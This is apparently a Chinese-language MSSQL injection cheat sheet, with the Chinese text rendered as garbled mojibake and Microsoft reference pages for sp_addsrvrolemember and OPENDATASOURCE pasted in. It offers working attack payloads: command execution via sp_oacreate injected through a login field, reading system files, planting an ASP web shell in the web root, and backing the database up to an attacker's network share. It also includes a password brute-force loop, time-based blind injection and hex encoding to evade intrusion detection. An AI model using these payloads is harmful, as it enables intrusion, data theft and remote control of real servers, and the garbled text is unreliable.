ʹÓÃ'bulk insert'Óï·¨¿ÉÒÔ½«Ò»¸öÎı¾Îļþ²åÈëµ½Ò»¸öÁÙʱ±íÖС£¼òµ¥µØ´´½¨Õâ¸ö±í£º
create table foo( line varchar(8000) )
È»ºóÖ´ÐÐbulk insert²Ù×÷°ÑÎļþÖеÄÊý¾Ý²åÈëµ½±íÖУ¬È磺
bulk insert foo from 'c:/inetpub/wwwroot/admin/inc.asp'

bcp "select * from text..foo" queryout c:/inetpub/wwwroot/runcommand.asp -c -Slocalhost -Usa -Pfoobar
'S'²ÎÊýΪִÐвéѯµÄ·þÎñÆ÷£¬'U'²ÎÊýΪÓû§Ãû£¬'P'²ÎÊýΪÃÜÂ룬ÕâÀïΪ'foobar'

SQL SERVERÖÐÌṩÁ˼¸¸öÄÚÖõÄÔÊÐí´´½¨ActiveX×Ô¶¯Ö´Ðнű¾µÄ´æ´¢¹ý³Ì¡£ÕâЩ½Å±¾ºÍÔËÐÐÔÚwindows½Å±¾½âÊÍÆ÷ϵĽű¾£¬»òÕßASP½Å±¾³ÌÐòÒ»Ñù----ËûÃÇʹÓÃVBScript»òJavaScriptÊéд£¬ËûÃÇ´´½¨×Ô¶¯Ö´ÐжÔÏ󲢺ÍËüÃǽ»»¥¡£Ò»¸ö×Ô¶¯Ö´Ðнű¾Ê¹ÓÃÕâÖÖ·½·¨Êéд¿ÉÒÔÔÚTransact-SQLÖÐ×öÈκÎÔÚASP½Å±¾ÖУ¬»òÕßWSH½Å±¾ÖпÉÒÔ×öµÄÈκÎÊÂÇé
ʹÓÃ'wscript.shell'¶ÔÏó½¨Á¢ÁËÒ»¸ö¼Çʱ¾µÄʵÀý£º
declare @o int
exec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',NULL,'notepad.exe'
Ö¸¶¨ÔÚÓû§ÃûºóÃæÀ´Ö´ÐÐËü£º
Username£º'; declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'notepad.exe'--

ʹÓÃFSO¶ÁÒ»¸öÒÑÖªµÄÎı¾Îļþ£º
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:/boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

´´½¨ÁËÒ»¸öÄÜÖ´ÐÐͨ¹ýÌá½»µÄÃüÁĬÈÏÊÇaspÄÇ×éȨÏÞµÄÓû§ÏÂÔËÐУ¬Ç°ÌáÊÇsp_oacreateÀ©Õ¹´æÔÚ
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:/inetpub/wwwroot/foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'<% set o = server.createobject("wscript.shell"): o.run(
request.querystring("cmd") ) %>'

sp_who '1' select * from sysobjects

Õë¶Ô¾ÖÓòÍøÉø͸,±¸·ÝÍÏ¿â»òÕß·ÇsaÓû§
declare @a sysname;set @a=db_name();backup database @a to disk=ÄãµÄIPÄãµÄ¹²ÏíĿ¼bak.dat ,name=test;--
µ±Ç°Êý¾Ý¿â¾Í±¸·Ýµ½ÄãµÄÓ²ÅÌÉÏÁË
select * from openrowset(sqloledb,myserver;sa;,select * from table) »ØÁ¬£¬Ä¬ÈÏÐèÒªÖ§³Ö¶àÓï¾ä²éѯ

Ìí¼ÓµÇ¼£¬Ê¹Æä³ÉΪ¹Ì¶¨·þÎñÆ÷½ÇÉ«µÄ³ÉÔ±¡£
Óï·¨
sp_addsrvrolemember [ @loginame = ] 'login'
[@rolename =] 'role'
²ÎÊý
[@loginame =] 'login'
ÊÇÌí¼Óµ½¹Ì¶¨·þÎñÆ÷½ÇÉ«µÄµÇ¼Ãû³Æ¡£login µÄÊý¾ÝÀàÐÍΪ sysname£¬Ã»ÓÐĬÈÏÖµ¡£login ¿ÉÒÔÊÇ Microsoft? SQL Server? µÇ¼»ò Microsoft Windows NT? Óû§ÕÊ»§¡£Èç¹û»¹Ã»ÓжԸà Windows NT µÇ¼ÊÚÓè SQL Server ·ÃÎÊȨÏÞ£¬ÄÇô½«×Ô¶¯¶ÔÆäÊÚÓè·ÃÎÊȨÏÞ¡£
[@rolename =] 'role'
Òª½«µÇ¼Ìí¼Óµ½µÄ¹Ì¶¨·þÎñÆ÷½ÇÉ«µÄÃû³Æ¡£role µÄÊý¾ÝÀàÐÍΪ sysname£¬Ä¬ÈÏֵΪ NULL£¬Ëü±ØÐëÊÇÏÂÁÐÖµÖ®Ò»£º
sysadmin
securityadmin
serveradmin
setupadmin
processadmin
diskadmin
dbcreator
bulkadmin
·µ»Ø´úÂëÖµ
0£¨³É¹¦£©»ò 1£¨Ê§°Ü£©
×¢ÊÍ
ÔÚ½«µÇ¼Ìí¼Óµ½¹Ì¶¨·þÎñÆ÷½Çɫʱ£¬¸ÃµÇ¼¾Í»áµÃµ½Óë´Ë¹Ì¶¨·þÎñÆ÷½ÇÉ«Ïà¹ØµÄȨÏÞ¡£
²»Äܸü¸Ä sa µÇ¼µÄ½ÇÉ«³ÉÔ±×ʸñ¡£
ÇëʹÓà sp_addrolemember ½«³ÉÔ±Ìí¼Óµ½¹Ì¶¨Êý¾Ý¿â½ÇÉ«»òÓû§¶¨ÒåµÄ½ÇÉ«¡£
²»ÄÜÔÚÓû§¶¨ÒåµÄÊÂÎñÄÚÖ´ÐÐ sp_addsrvrolemember ´æ´¢¹ý³Ì¡£
ȨÏÞ
sysadmin ¹Ì¶¨·þÎñÆ÷µÄ³ÉÔ±¿ÉÒÔ½«³ÉÔ±Ìí¼Óµ½Èκι̶¨·þÎñÆ÷½ÇÉ«¡£¹Ì¶¨·þÎñÆ÷½ÇÉ«µÄ³ÉÔ±¿ÉÒÔÖ´ÐÐ sp_addsrvrolemember ½«³ÉÔ±Ö»Ìí¼Óµ½Í¬Ò»¸ö¹Ì¶¨·þÎñÆ÷½ÇÉ«¡£
ʾÀý
ÏÂÃæµÄʾÀý½« Windows NT Óû§ Corporate/HelenS Ìí¼Óµ½ sysadmin ¹Ì¶¨·þÎñÆ÷½ÇÉ«ÖС£
EXEC sp_addsrvrolemember 'Corporate/HelenS', 'sysadmin'

OPENDATASOURCE
²»Ê¹ÓÃÁ´½ÓµÄ·þÎñÆ÷Ãû£¬¶øÌṩÌØÊâµÄÁ¬½ÓÐÅÏ¢£¬²¢½«Æä×÷ΪËIJ¿·Ö¶ÔÏóÃûµÄÒ»²¿·Ö¡£
Óï·¨
OPENDATASOURCE ( provider_name, init_string )
²ÎÊý
provider_name
×¢²áΪÓÃÓÚ·ÃÎÊÊý¾ÝÔ´µÄ OLE DB Ìṩ³ÌÐòµÄ PROGID µÄÃû³Æ¡£provider_name µÄÊý¾ÝÀàÐÍΪ char£¬Ã»ÓÐĬÈÏÖµ¡£
init_string
Á¬½Ó×Ö·û´®£¬ÕâЩ×Ö·û´®½«Òª´«µÝ¸øÄ¿±êÌṩ³ÌÐòµÄ IDataInitialize ½Ó¿Ú¡£Ìṩ³ÌÐò×Ö·û´®Óï·¨ÊÇÒԹؼü×ÖÖµ¶ÔΪ»ù´¡µÄ£¬ÕâЩ¹Ø¼ü×ÖÖµ¶ÔÓɷֺŸô¿ª£¬ÀýÈ磺"keyword1=value; keyword2=value."
ÔÚ Microsoft? Data Access SDK Öж¨ÒåÁË»ù±¾Óï·¨¡£ÓйØËùÖ§³ÖµÄÌض¨¹Ø¼ü×ÖÖµ¶ÔµÄÐÅÏ¢£¬Çë²Î¼ûÌṩ³ÌÐòÖеÄÎĵµ¡£Ï±íÁгö init_string ²ÎÊýÖÐ×î³£ÓõĹؼü×Ö¡£
¹Ø¼ü×Ö OLE DB ÊôÐÔ ÓÐЧֵºÍÃèÊö
Êý¾ÝÔ´ DBPROP_INIT_DATASOURCE ÒªÁ¬½ÓµÄÊý¾ÝÔ´µÄÃû³Æ¡£²»Í¬µÄÌṩ³ÌÐòÓò»Í¬µÄ·½·¨¶Ô´Ë½øÐнâÊÍ¡£¶ÔÓÚ SQL Server OLE DB Ìṩ³ÌÐòÀ´Ëµ£¬Õâ»áÖ¸Ã÷·þÎñÆ÷µÄÃû³Æ¡£¶ÔÓÚ Jet OLE DB Ìṩ³ÌÐòÀ´Ëµ£¬Õâ»áÖ¸Ã÷ .mdb Îļþ»ò .xls ÎļþµÄÍêÕû·¾¶¡£
λÖà DBPROP_INIT_LOCATION ÒªÁ¬½ÓµÄÊý¾Ý¿âµÄλÖá£
À©Õ¹ÊôÐÔ DBPROP_INIT_PROVIDERSTRING Ìṩ³ÌÐòÌض¨µÄÁ¬½Ó×Ö·û´®¡£
Á¬½Ó³¬Ê± DBPROP_INIT_TIMEOUT ³¬Ê±Öµ£¬Ôڸó¬Ê±Öµºó£¬Á¬½Ó³¢ÊÔ½«Ê§°Ü¡£
Óû§ ID DBPROP_AUTH_USERID ÓÃÓÚ¸ÃÁ¬½ÓµÄÓû§ ID¡£
ÃÜÂë DBPROP_AUTH_PASSWORD ÓÃÓÚ¸ÃÁ¬½ÓµÄÃÜÂë¡£
Ŀ¼ DBPROP_INIT_CATALOG Á¬½Óµ½Êý¾ÝԴʱµÄ³õʼ»òĬÈϵÄĿ¼Ãû³Æ¡£

OPENDATASOURCE º¯Êý¿ÉÒÔÔÚÄܹ»Ê¹ÓÃÁ´½Ó·þÎñÆ÷ÃûµÄÏàͬ Transact-SQL Ó﷨λÖÃÖÐʹÓá£Òò´Ë£¬¾Í¿ÉÒÔ½« OPENDATASOURCE ÓÃ×÷ËIJ¿·ÖÃû³ÆµÄµÚÒ»²¿·Ö£¬¸ÃÃû³ÆÖ¸µÄÊÇ SELECT¡¢INSERT¡¢UPDATE »ò DELETE Óï¾äÖеıí»òÊÓͼµÄÃû³Æ£»»òÕßÖ¸µÄÊÇ EXECUTE Óï¾äÖеÄÔ¶³Ì´æ´¢¹ý³Ì¡£µ±Ö´ÐÐÔ¶³Ì´æ´¢¹ý³Ìʱ£¬OPENDATASOURCE Ó¦¸ÃÖ¸µÄÊÇÁíÒ»¸ö SQL Server¡£OPENDATASOURCE ²»½ÓÊܲÎÊý±äÁ¿¡£
Óë OPENROWSET º¯ÊýÀàËÆ£¬OPENDATASOURCE Ó¦¸ÃÖ»ÒýÓÃÄÇЩ²»¾­³£·ÃÎ浀 OLE DB Êý¾ÝÔ´¡£¶ÔÓÚ·ÃÎÊ´ÎÊýÉÔ¶àµÄÈκÎÊý¾ÝÔ´£¬ÇëΪËüÃǶ¨ÒåÁ´½ÓµÄ·þÎñÆ÷¡£ÎÞÂÛ OPENDATASOURCE »¹ÊÇ OPENROWSET ¶¼²»ÄÜÌṩÁ´½ÓµÄ·þÎñÆ÷¶¨ÒåµÄÈ«²¿¹¦ÄÜ£¬ÀýÈ磬°²È«¹ÜÀíÒÔ¼°²éѯĿ¼ÐÅÏ¢µÄÄÜÁ¦¡£Ã¿´Îµ÷Óà OPENDATASOURCE ʱ£¬¶¼±ØÐëÌṩËùÓеÄÁ¬½ÓÐÅÏ¢£¨°üÀ¨ÃÜÂ룩¡£
ʾÀý
ÏÂÃæµÄʾÀý·ÃÎÊÀ´×Ôij¸ö±íµÄÊý¾Ý£¬¸Ã±íÔÚ SQL Server µÄÁíÒ»¸öʵÀýÖС£
SELECT *
FROM OPENDATASOURCE(
'SQLOLEDB',
'Data Source=ServerName;User ID=MyUID;Password=MyPass'
).Northwind.dbo.Categories

ÏÂÃæÊǸö²éѯµÄʾÀý£¬Ëüͨ¹ýÓÃÓÚ Jet µÄ OLE DB Ìṩ³ÌÐò²éѯ Excel µç×Ó±í¸ñ¡£
SELECT *
FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="c:/Finance/account.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions

Õë¶ÔMSDASQL Óô洢¹ý³Ì½¨Á¢µÄsqlÁ¬½Ó£¬ÔÚblackbox²âÊÔÖУ¬ºÃÏóûʲôעÈëÇø±ð
declare @username nvarchar(4000), @query nvarchar(4000)
declare @pwd nvarchar(4000), @char_set nvarchar(4000)
declare @pwd_len int, @i int, @c char
select @char_set = N'abcdefghijklmnopqrstuvwxyz0123456789!_'
select @pwd_len = 8
select @username = 'sa'
while @i < @pwd_len begin
-- make pwd
(code deleted)
-- try a login
select @query = N'select * from
OPENROWSET(''MSDASQL'',''DRIVER={SQL Server};SERVER=;uid=' + @username +
N';pwd=' + @pwd + N''',''select @@version'')'
exec xp_execresultset @query, N'master'
--check for success
(code deleted)
-- increment the password
(code deleted)
end

äע¼¼ÇÉÖ®Ò»£¬Ê±¼äÑÓ»º£¨¿ÉÒÔ¼ÓÒ»¸öÑ­»·º¯Êý£¬ÔËÐвéѯʱ¼äÔ½¾Ã˵˵Ã÷µ±Ç°×Ö¶ÎÕýÈ·£©
if (select user) = 'sa' waitfor delay '0:0:5'

if exists (select * from pubs..pub_info) waitfor delay '0:0:5'

create table pubs..tmp_file (is_file int, is_dir int, has_parent int)
insert into pubs..tmp_file exec master..xp_fileexist 'c:/boot.ini'
if exists (select * from pubs..tmp_file) waitfor delay '0:0:5'
if (select is_file from pubs..tmp_file) > 0 waitfor delay '0:0:5'

×Ö·û¶Ô±È
if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor
delay '0:0:5'
declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s,
1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5'
declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s,
1, 1)) & ( power(2, 1))) > 0 waitfor delay '0:0:5'

±àÂëµÄÃØÃÜ£¬ÈĹýIDS
declare @q varchar(8000)
select @q = 0x73656c65637420404076657273696f6e
exec(@q)

This runs 'select @@version', as does:

declare @q nvarchar(4000)
select @q =
0x730065006c00650063007400200040004000760065007200730069006f006e00
exec(@q)

In the stored procedure example above we saw how a 'sysname' parameter can contain
multiple SQL statements without the use of single quotes or semicolons:

sp_msdropretry [foo drop table logs select * from sysobjects], [bar]
ÎÄÕÂÆÀÂÛ

¹²ÓÐ 0 ÌõÆÀÂÛ